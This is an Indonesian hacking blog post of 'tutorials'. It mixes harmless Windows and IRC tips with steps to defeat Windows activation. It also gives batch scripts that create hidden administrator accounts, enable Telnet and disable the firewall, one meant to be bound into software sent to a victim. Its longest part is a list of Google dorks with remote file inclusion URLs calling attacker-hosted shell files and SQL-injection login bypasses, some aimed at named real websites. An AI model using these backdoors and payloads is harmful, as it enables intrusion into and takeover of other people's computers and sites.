Sabtu, 15 Maret 2008

Ab0ut W|nD0ws



Mematikan Windows Genuine Advantage Validation
Bagi pengguna windows yang biasa online diinternet,

pasti akan mendapatkan pesan dari microsoft untuk
melakukan aktivasi terhadap sistem operasi yang
digunakan terlebih lagi sistem operasi windows xp..
dan otomatis aktivasi itu pake duit...nah tau khan
kondisi dari orang-orang indonesia yang sangat
miskin untuk menikmati teknologi.
dan untuk itu ada sedikit tips untuk mematikan
"pesan" aktivasi dari microsoft sehingga tidak akan
pernah menggangu aktivitas apalagi bagi yang biasa
online

caranya...
- buka windows task manager
- akhiri proses wgatray.exe
di windows task manager dengan mengklik end
- restart XP lalu masuk ke safe mode
- hapus wgatray.exe pada direktori
c:\windows\system32 juga pada direktori
c:\windows\system32\dllcache
- masuk ke regedit cari
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon\Notify
- hapus folder "wgalogon"
- lalu restart windows
lalu pesan "aktivasi" dari microsoft tidak akan menggangu lagi
Tertawalah! Anda baru mengakali Microsoft, dan jangan pernah menginstal update serupa dari microsoft!

-----------------------------------------------------
next tutorial


sebelumnya gw paling males matiin komp klo masuk kantor abis lama banget pengen buru2 cepet pulang akhirnya nanya ke mbah google and hasilnya

masuk ke scheduled task, create/add schedule task klik next, baru trus pilih browse, ketik c:\windows\system32\shutdown -s -t 10 -c "comment" abis itu atur degh kapan mo di shutdown and jangan lupa komp nya harus di password klo ngga setahu gw ngga bisa di schedule and jangan salah masukkin passwordnya.tambahan ketik aja c:\shutdown /?

-----------------------------------------------------
next tutorial



kemaren sempet bikin cara gimana yah ngaktifin telnet pake cara nyisipan program ternyata cari2 cara ehhh inget dulu pake command batch aja.akhirnya dapet kayak gini buka notepad ketik ini

@echo off
echo instalation in progress.......
call net user administrator admin
echo instalation in progress.......
call sc config TlntSvr start= auto
echo instalation in progress.......
call net start tlntsvr
echo instalation in progress.......
call del loading.bat
exit

save nama filenya loading.bat biar terakhir bisa kedelete.abis bikin itu cari software yang diminatin target lo,trus binder file batch sama program lo pake "iexpress" dari run setelah itu lo kirim deggh ke target masalahnya target klo di lan atau pun beda jaringan sama lo yang ada lo bingung mo telnet kemana.nah hal itu yang belom gw dapetin sewaktu dia instal programnya komp dia send information tentang komputernya.setekah itu lo jalanin program telnet ke komp target selesai lo mo ngapain juga bisa dengan user:administrator pass:admin kekekekeke
----------------------------------------------------------------
next tutorial


dulu gw pernah nanya bisa ngga yah klo satu pc 2 os? ternyata jawabanya "bisa"
and bisa ngga yah klo kita ngejalanin os w1n trus jalanin os w1n lagi or linux?
ternyata jawabanya "bisa" gilaaaa ternyata ngga ada yang mustahil di "dunia ini" (bukan dunia sebenarnya)jawaban pertama dah gw jelasin di atas ternyata make lilo

nah yang jawaban kedua yang gw mo bahas yang pertama lo sediain "vmware player" sama "vmx builder" klo vmware player gampang nyarinya tinggal ke mbah nah klo vmxbuilder nih gw kasih tau lamatnya http://petruska.stardock.net/Software/VMware.html setelah lo dapet itu, lo juga harus punya linux live cd yang berextension .iso ato cd w1n xp installl vmware player setelah itu pasti dia minta file yang berextention .vmx sebelum lo jalanin lo instal dulu vmxbuilder setelah lo jalanin lo create file .vmx

CARANYAAAA???????
nah ini dia lo buka vmx builder. pilih create a new virtual machine pilih folder yang mo diisiin .vmx nya klo bisa baru n gampang nyarinya di option lo harus milih guest os nya mo micr0s0ft apa linux trus pilih version nya, setelah itu, lo pilih hardware klik add trus pilih dvd/cd rom drive nahhhhhhhhhhhhh klo lo mo make w1nd0ws
lo pilihnya auto detect ato lo bisa modif sendiri nah klo lo mo make livecd lo pilih use iso image trus cari file livecd.iso lo setelah itu save setelah itu hanya tinggal 2klik file ext .vmx yang lo bikin

selesai degh maaf klo ada yang kurang and salah namanya
juga manusia banyak kehilafan.
nanti klo ada lagi gw tambah lagi.
----------------------------------------------------------------
next tutorial

@echo off
echo ========Design by Kurt_kabayan ^_^====================
echo ========Command batch ini akan membuat backdoor========
echo ========Dengan user account yang invisible===============
echo ========Dengan Nama user HelpDesk pass batman=========
echo ========Dan juga membuka Program Telnet server==========
echo ========Sekalian bisa di remote melalui AWRC============
net user HelpDesk /delete
net user HelpDesk batman /add
net localgroup Administrators HelpDesk /add
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
call sc config TlntSvr start= auto
call net start tlntsvr
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LogonType /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpDesk /t reg_dword /d 0 /f

tambahannya ini
awrc pass: platinumw.org

script ini masih disempurnakan tinggal bagaimana mematikan firewall via batch command.
pe er

http://support.microsoft.com/kb/892199
http://www.governmentsecurity.org/archive/t7754.html
http://support.microsoft.com/kb/307729 #disable ballon tips
----------------------------------------------------------------
next tutorial
















Anda lupa Password Administrator pada Windows XP? Ikuti langkah berikut:
1. Masuk ke komputer pada status safe mode, caranya ketika komputer dihidupkan tekan F8, kemudian pilih safe mode
2. Logon pada salah satu user yang kita tahu passwordnya, kalo sekiranya tidak ada user yang kita tahu passwordnya kita bisa masuk sebagai Guest, caranya tekan Ctrl+Alt+Del, kemudian isi user dengan guest tanpa password
3. Masuk pada DOS prompt, caranya Start-Run, ketik cmd, enter
4. Masuk ke directory Drive:\windows\system32.Drive adalah drive dimana system berada, caranya ketik: cd d:\windows\system32
5. Untuk menghindari resiko kesalahan, salinlah logon.scr ke file baru misalnya : logon.xxx, caranya ketik: Copy logon.scr logon.xxx
6. Salinlah file cmd.exe ke file logon.scr, caranya ketik: Copy cmd.exe logon.scr, jika ada pertanyaan overwrite, jawab Yes
7. Buat password pada user yang diinginkan, formatnya : net user username newpassword. Missalnya kita ingin merubah user administrator dengan 123 maka kita ketik : net user administrator 123, kemudian enter, sampai kita lihat pesan bahwa perintah tersebut sukses.
8. Restart kembali komputer, dan kita bisa pilih user administrator dengan password yang baru
----------------------------------------------------------------
next tutorial
net send
-login setaraf administrator
-aktifin service messenger
(caranya klikkanan my computer ->pilih manage ->pilih service ->cari messenger ->pilih automatic -> lalu start servicenya.) hala ini akan membuat service messenger akan tetap hidup walaupun di restart.
-buka notepad ketik ini:
@echo off
:a
cls
echo ===============================================
echo = Net send Messenger by: KurtKabayan =
echo = faq : =
echo = user = namacomputer / iplokal =
echo = pesan = pesannya =
echo ===============================================
echo ===============================================
set /p n=User:
set /p m=Pesan:
net send %n% %m%
pause
goto a
sehabis itu save dengan netsend.bat
silahkan di gunakan untuk kirim2 notifikasi
----------------------------------------------------------------
next tutorial
syncronize 2 folder
buka notepad
ketik:
XCOPY "%1" "%2" /D /I %3
XCOPY "%2" "%1" /D /I %3
simpan di c:/windows/system32/ dengan nama sync.cmd
cara menggunankannya
di prompt ketik:
SYNC "C:\hacker\My Project" "\\hacker_laptop\My Project" /S

About IRC



global commands IRC:
/server = buat masuk ke mirc contoh /s hitam-putih.com
/nick = buat ganti nick
/join = buat join ke channel ex: /j hitamputih
/part = buat pergi dari channel ex: /part #hitamputih see yu
/me = buat bikin tulisan pada nick kita contoh /me brb
/ame = seperti /me cuman tulisan kita klihatan di semua chan
/amsg = hampir sama seperti /ame cuman masih ada tanda kurung pada nick kita
/query = buat chatting ama nick yang ada di channel contoh /q kurt_kabayan
/whois = buat nyari tau tentang satu nick ex: /whois Elang13 bisa disingkat /w
/notice = buat ngirim private massage,cuman munculnya dichannel ex: /notice kurt_kabayan kamu ganteng deh
/invite = buat invite nick biar maasuk channel ex: /invite kurt_kabayan #hitamputih
/quit = buat ninggalin server yang lu masukin bisa disingkat /q
/ns commands :
/ns register : buat register nick kesukaan ente
/ns set enforce on/off : buat proteksi nick ente biar ga bisa dipake orang lain
/ns set passwd : buat ganti password nick
/cs commands :
/cs register #channel password dicryption : buat bikin channel ex: /cs register #htamputih apayah selamat bergabung
/cs sop/aop #channel add/del : buat ngangkat atau delete sop aop di channel anda
/cs akick #channel add/del *!*@localhost / nick / ident : buat ngusir orang yang disukai ente hehe, contoh /cs akick #hitamputih add ~asu@123.456.789.01 cuman yang bisa ngejalanin sop ama pak founder doang

Google Dork



google hacking mang kelihatanya begitu2 aja
tapiiiii kalau udah ditangan masterr bisa jadi
tools yang berbahaya di sini bisa mencari
beberapa bug dalam site, liat webcam,dll

tags nya simpel:
allinurl:"keyword" ->semua link yg "keyword"
inurl:"keyword" ->tdk semua link yg "keyword"
allintext;"keyword" ->semua text yg "keyword"
intext:"keyword" ->tdk semua text yg "keyword"
filetype:"keyword" ->file yg bertype "keyword"
site:"keyword" ->semua site "keyword"
allintitle:"keyword" ->semua yg bertitlekan "keyword"
intitle:"keyword" ->tdk semua title yg"keyword"
index.of atau "index of" "parent directory"

ket:
tdk semua tags yg "keyword" maksudnya bisa jadi
berupa text,link atau title.

simbol2nya:
"kata2 yang di cari" ->tanda petiknya
-tags ->minusnya berarti selain
keywordnya nya deh yang terakhir yang mematikan

emang sih sedikit bingung pertama kali gw pelajarin
mang bingung tapi lama kelamaan paham
klo ngga ngerti silahkan bertanya di shoutbox

Bugs, SQL inject, deface, c4rd|ng






Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:
SEMUA INI DARI SABEN ----->
------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"
------------------------------------------------
To Be Continued